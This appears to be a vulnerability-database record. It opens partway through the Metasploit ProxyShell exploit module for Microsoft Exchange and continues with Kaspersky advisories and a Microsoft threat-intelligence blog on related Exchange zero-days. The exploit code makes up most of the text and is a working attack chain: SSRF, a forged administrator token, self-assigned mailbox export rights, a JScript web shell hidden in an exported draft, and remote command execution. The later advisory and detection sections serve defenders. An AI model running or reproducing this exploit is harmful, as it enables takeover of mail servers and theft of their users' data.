xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n { server: server, legacy_dn: legacy_dn }\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(legacy_dn)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n '/mapi/emsmdb',\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response&.code == 200\n sid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def get_sid_for_email(email)\n autodiscover = request_autodiscover(email)\n request_mapi(autodiscover[:legacy_dn])\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def exploit_setup\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status('Retrieving backend FQDN over RPC request')\n server_name = request_fqdn\n print_status(\"Internal server name: #{server_name}\")\n end\n @backend_server_name = server_name\n\n get_common_access_token\n print_good('Successfully assigned the \\'Mailbox Import Export\\' role')\n print_good(\"Proceeding with SID: #{@mailbox_user_sid} (#{@mailbox_user_email})\")\n end\n\n def probe_powershell_backend(common_access_token)\n powershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{common_access_token}\")\n fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200\n end\n\n # this function doesn't return unless it's successful\n def get_common_access_token\n # get a SID from the specified email address\n email_address = datastore['EMAIL']\n unless email_address.blank?\n sid = get_sid_for_email(email_address)\n vprint_status(\"SID: #{sid} (#{email_address})\")\n common_access_token = build_token(sid)\n probe_powershell_backend(common_access_token)\n\n print_status(\"Assigning the 'Mailbox Import Export' role via #{email_address}\")\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: email_address }\n ])\n unless role_assigned\n fail_with(Failure::BadConfig, 'The specified email address does not have the \\'Mailbox Import Export\\' role and can not self-assign it')\n end\n\n @mailbox_user_sid = sid\n @mailbox_user_email = email_address\n @common_access_token = common_access_token\n return\n end\n\n print_status('Enumerating valid email addresses and searching for one that either has the \\'Mailbox Import Export\\' role or can self-assign it')\n get_emails.each do |this_email_address|\n next if this_email_address == email_address # already tried this one\n\n vprint_status(\"Reattempting to assign the 'Mailbox Import Export' role via #{this_email_address}\")\n begin\n this_sid = get_sid_for_email(this_email_address)\n rescue RuntimeError\n print_error(\"Failed to identify the SID for #{this_email_address}\")\n next\n end\n\n common_access_token = build_token(this_sid)\n role_assigned = execute_powershell('New-ManagementRoleAssignment', cat: common_access_token, args: [\n { name: '-Role', value: 'Mailbox Import Export' },\n { name: '-User', value: this_email_address }\n ])\n next unless role_assigned\n\n @mailbox_user_sid = this_sid\n @mailbox_user_email = this_email_address\n @common_access_token = common_access_token\n return # rubocop:disable Lint/NonLocalExitFromIterator\n end\n\n fail_with(Failure::NoAccess, 'No user with the necessary management role was identified')\n end\n\n def send_http(method, uri, opts = {})\n ssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n opts[:cookie] = \"Email=#{ssrf}\"\n super(method, \"/#{ssrf}#{uri}\", opts)\n end\n\n def get_emails\n mailbox_table = Rex::Text::Table.new(\n 'Header' => 'Exchange Mailboxes',\n 'Columns' => %w[EmailAddress Name RoutingType MailboxType]\n )\n\n MailboxEnumerator.new(self).each do |row|\n mailbox_table << row\n end\n\n print_status(\"Enumerated #{mailbox_table.rows.length} email addresses\")\n stored_path = store_loot('ad.exchange.mailboxes', 'text/csv', rhost, mailbox_table.to_csv)\n print_status(\"Saved mailbox and email address data to: #{stored_path}\")\n\n mailbox_table.rows.map(&:first)\n end\n\n def create_embedded_draft(user_sid)\n @shell_input_name = rand_text_alphanumeric(8..12)\n @draft_subject = rand_text_alphanumeric(8..12)\n print_status(\"Saving a draft email with subject '#{@draft_subject}' containing the attachment with the embedded webshell\")\n payload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\"))\n file_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\"\n envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)\n\n send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n datastore['IISWritePath'].gsub('\\\\', '/')\n else\n datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n end\n\n def build_token(sid)\n uint8_tlv = proc do |type, value|\n type + [value.length].pack('C') + value\n end\n\n token = uint8_tlv.call('V', \"\\x00\")\n token << uint8_tlv.call('T', 'Windows')\n token << \"\\x43\\x00\"\n token << uint8_tlv.call('A', 'Kerberos')\n token << uint8_tlv.call('L', 'Administrator')\n token << uint8_tlv.call('U', sid)\n\n # group data for S-1-5-32-544\n token << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\"\n Rex::Text.encode_base64(token)\n end\n\n def exploit\n @ssrf_email ||= Faker::Internet.email\n print_status('Attempt to exploit for CVE-2021-34473')\n exploit_setup\n\n create_embedded_draft(@mailbox_user_sid)\n @shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\"\n if datastore['UseAlternatePath']\n unc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n else\n unc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n end\n\n normal_path = unc_path.gsub(/^\\\\+[\\w.-]+\\\\(.)\\$\\\\/, '\\1:\\\\')\n print_status(\"Writing to: #{normal_path}\")\n register_file_for_cleanup(normal_path)\n\n @export_name = rand_text_alphanumeric(8..12)\n successful = execute_powershell('New-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Name', value: @export_name },\n { name: '-Mailbox', value: @mailbox_user_email },\n { name: '-IncludeFolders', value: '#Drafts#' },\n { name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" },\n { name: '-ExcludeDumpster' },\n { name: '-FilePath', value: unc_path }\n ])\n fail_with(Failure::UnexpectedReply, 'The mailbox export request failed') unless successful\n\n exported = false\n print_status('Waiting for the export request to complete...')\n 30.times do\n sleep 5\n next unless send_request_cgi('uri' => normalize_uri(web_directory, @shell_filename))&.code == 200\n\n print_good('The mailbox export request has completed')\n exported = true\n break\n end\n\n fail_with(Failure::Unknown, 'The mailbox export request timed out') unless exported\n\n print_status('Triggering the payload')\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n boundary = rand_text_alphanumeric(8..12)\n response = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\")\n\n print_warning('Dumping command output in response')\n if response.body =~ /START#{boundary}(.*)END#{boundary}/m\n print_line(Regexp.last_match(1).strip)\n else\n print_error('Empty response, no command output')\n end\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\n def cleanup\n super\n return unless @common_access_token && @export_name\n\n print_status('Removing the mailbox export request')\n execute_powershell('Remove-MailboxExportRequest', cat: @common_access_token, args: [\n { name: '-Identity', value: \"#{@mailbox_user_email}\\\\#{@export_name}\" },\n { name: '-Confirm', value: false }\n ])\n\n print_status('Removing the draft email')\n execute_powershell('Search-Mailbox', cat: @common_access_token, args: [\n { name: '-Identity', value: @mailbox_user_email },\n { name: '-SearchQuery', value: \"Subject:\\\"#{@draft_subject}\\\"\" },\n { name: '-Force' },\n { name: '-DeleteContent' }\n ])\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @shell_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@shell_input_name}=#{cmd}\"\n )\n end\nend\n\n# Use https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/resolvenames to resolve mailbox\n# information. The endpoint only returns 100 at a time though so if the target has more than that many email addresses\n# multiple requests will need to be made. Since the endpoint doesn't support pagination, we refine the query by using\n# progressively larger search prefixes until there are less than 101 results and thus will fit into a single response.\nclass MailboxEnumerator\n def initialize(mod)\n @mod = mod\n end\n\n # the characters that Exchange Server 2019 allows in an alias (no unicode)\n ALIAS_CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\\'*+-/=?^_`{|}~'.freeze\n XML_NS = {\n 'm' => 'http://schemas.microsoft.com/exchange/services/2006/messages',\n 't' => 'http://schemas.microsoft.com/exchange/services/2006/types'\n }.freeze\n\n include Enumerable\n XMLTemplate = Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::XMLTemplate\n\n def each(name: 'SMTP:', &block)\n envelope = XMLTemplate.render('soap_getemails', name: name)\n res = @mod.send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n return unless res&.code == 200\n\n if res.get_xml_document.xpath('//m:ResolutionSet/@IncludesLastItemInRange', XML_NS).first&.text&.downcase == 'false'\n ALIAS_CHARSET.each_char do |char|\n each(name: name + char, &block)\n end\n else\n res.get_xml_document.xpath('//t:Mailbox', XML_NS).each do |mailbox|\n yield %w[t:EmailAddress t:Name t:RoutingType t:MailboxType].map { |xpath| mailbox.xpath(xpath, XML_NS)&.text || '' }\n end\n end\n end\nend\n\nclass PstEncoding\n ENCODE_TABLE = [\n 71, 241, 180, 230, 11, 106, 114, 72,\n 133, 78, 158, 235, 226, 248, 148, 83,\n 224, 187, 160, 2, 232, 90, 9, 171,\n 219, 227, 186, 198, 124, 195, 16, 221,\n 57, 5, 150, 48, 245, 55, 96, 130,\n 140, 201, 19, 74, 107, 29, 243, 251,\n 143, 38, 151, 202, 145, 23, 1, 196,\n 50, 45, 110, 49, 149, 255, 217, 35,\n 209, 0, 94, 121, 220, 68, 59, 26,\n 40, 197, 97, 87, 32, 144, 61, 131,\n 185, 67, 190, 103, 210, 70, 66, 118,\n 192, 109, 91, 126, 178, 15, 22, 41,\n 60, 169, 3, 84, 13, 218, 93, 223,\n 246, 183, 199, 98, 205, 141, 6, 211,\n 105, 92, 134, 214, 20, 247, 165, 102,\n 117, 172, 177, 233, 69, 33, 112, 12,\n 135, 159, 116, 164, 34, 76, 111, 191,\n 31, 86, 170, 46, 179, 120, 51, 80,\n 176, 163, 146, 188, 207, 25, 28, 167,\n 99, 203, 30, 77, 62, 75, 27, 155,\n 79, 231, 240, 238, 173, 58, 181, 89,\n 4, 234, 64, 85, 37, 81, 229, 122,\n 137, 56, 104, 82, 123, 252, 39, 174,\n 215, 189, 250, 7, 244, 204, 142, 95,\n 239, 53, 156, 132, 43, 21, 213, 119,\n 52, 73, 182, 18, 10, 127, 113, 136,\n 253, 157, 24, 65, 125, 147, 216, 88,\n 44, 206, 254, 36, 175, 222, 184, 54,\n 200, 161, 128, 166, 153, 152, 168, 47,\n 14, 129, 101, 115, 228, 194, 162, 138,\n 212, 225, 17, 208, 8, 139, 42, 242,\n 237, 154, 100, 63, 193, 108, 249, 236\n ].freeze\n\n def self.encode(data)\n encoded = ''\n data.each_char do |char|\n encoded << ENCODE_TABLE[char.ord].chr\n end\n encoded\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxyshell_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-08-11T23:35:12", "description": "### *Detect date*:\n09/30/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Exchange Server 2016 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 22 \nMicrosoft Exchange Server 2019 Cumulative Update 11 \nMicrosoft Exchange Server 2019 Cumulative Update 12 \nMicrosoft Exchange Server 2013 Cumulative Update 23\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) \n[CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2022-41040](<https://vulners.com/cve/CVE-2022-41040>)5.0Critical \n[CVE-2022-41082](<https://vulners.com/cve/CVE-2022-41082>)5.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5019758](<http://support.microsoft.com/kb/5019758>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "kaspersky", "title": "KLA19264 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T00:00:00", "id": "KLA19264", "href": "https://threats.kaspersky.com/en/vulnerability/KLA19264/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:59:05", "description": "### *Detect date*:\n07/13/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 10 \nMicrosoft Exchange Server 2019 Cumulative Update 9 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 20 \nMicrosoft Exchange Server 2019 Cumulative Update 8 \nMicrosoft Exchange Server 2016 Cumulative Update 19 \nMicrosoft Exchange Server 2016 Cumulative Update 21\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31196](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31196>) \n[CVE-2021-34470](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34470>) \n[CVE-2021-31206](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31206>) \n[CVE-2021-34473](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34473>) \n[CVE-2021-34523](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34523>) \n[CVE-2021-33766](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33766>) \n[CVE-2021-33768](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33768>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-31196](<https://vulners.com/cve/CVE-2021-31196>)6.5High \n[CVE-2021-34470](<https://vulners.com/cve/CVE-2021-34470>)5.2High \n[CVE-2021-31206](<https://vulners.com/cve/CVE-2021-31206>)7.5Critical \n[CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)7.5Critical \n[CVE-2021-33766](<https://vulners.com/cve/CVE-2021-33766>)5.0Critical \n[CVE-2021-33768](<https://vulners.com/cve/CVE-2021-33768>)5.2High\n\n### *KB list*:\n[5001779](<http://support.microsoft.com/kb/5001779>) \n[5004780](<http://support.microsoft.com/kb/5004780>) \n[5004778](<http://support.microsoft.com/kb/5004778>) \n[5004779](<http://support.microsoft.com/kb/5004779>) \n[5003611](<http://support.microsoft.com/kb/5003611>) \n[5003612](<http://support.microsoft.com/kb/5003612>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "kaspersky", "title": "KLA12224 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-07-30T00:00:00", "id": "KLA12224", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12224/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-10-07T17:04:51", "description": "> **October 1, 2022** **update** \u2013 Added information about _Exploit:Script/ExchgProxyRequest.A_, Microsoft Defender AV\u2019s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance. \n\nMicrosoft is aware of [limited targeted attacks](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for mitigation guidance regarding these vulnerabilities. \n\nCVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.\n\n## Analysis of observed activity\n\n### Attacks using Exchange vulnerabilities prior to public disclosure\n\nMSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\n\nMicrosoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.\n\nFigure 1: Diagram of attacks using Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082\n\n### Observed activity after public disclosure\n\nOn September 28, 2022, GTSC released a [blog](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.\n\nWhile these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.\n\n## Mitigation\n\nCustomers should refer to [Microsoft Security Response Center\u2019s post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for the latest on mitigations for the Exchange product.\n\nMicrosoft Exchange Server customers using [Microsoft 365 Defender](<https://www.microsoft.com/en-us/security/business/siem-and-xdr/microsoft-365-defender>) are advised to follow this checklist:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Detection\n\n### Microsoft Defender Antivirus\n\n**Microsoft Exchange AMSI integration and Antivirus Exclusions**\n\nExchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the [guidance provided by the Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/bc-p/2576429/highlight/true>), as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange. \n\nMany organizations exclude Exchange directories from antivirus scans for performance reasons. It\u2019s highly recommended to audit AV exclusions on Exchange systems and assess if they can be removed without impacting performance and still ensure the highest level of protection. Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.\n\nTo audit AV exclusions on an Exchange Server running Defender Antivirus, launch the _Get-MpPreference_ command from an elevated PowerShell prompt.\n\nIf exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.\n\nMicrosoft Defender Antivirus detects the post-exploitation malware currently used in-the-wild exploitation of this vulnerability as the following:\n\n**Microsoft Defender Antivirus detections ******| **MITRE** **ATT&CK Tactics observed ** \n---|--- \n[Exploit:Script/ExchgProxyRequest.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.A&threatId=-2147134610>) \n[Exploit:Script/ExchgProxyRequest.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.B&threatId=-2147134593>) \n[Exploit:Script/ExchgProxyRequest.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Script/ExchgProxyRequest.C&threatId=-2147134381>) \n(the most robust defense from Microsoft Defender AV against this threat; requires Exchange AMSI to be enabled)| Initial Access \n[Backdoor:ASP/Webshell.Y](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:ASP/Webshell.Y>)| Persistence \n[Backdoor:Win32/RewriteHttp.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/RewriteHttp.A>)| Persistence \n[Backdoor:JS/SimChocexShell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/SimChocexShell.A!dha&threatId=-2147134707>)| Persistence \n[Behavior:Win32/IISExchgDropWebshell.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.A!dha&threatId=-2147189378>)| Persistence \nBehavior:Win32/IISExchgDropWebshell.A | Persistence \n[Trojan:Win32/IISExchgSpawnCMD.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/IISExchgSpawnCMD.A&threatId=-2147190657>)| Execution \n[Trojan:Win32/WebShellTerminal.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebShellTerminal.A&threatId=-2147189572>) | Execution 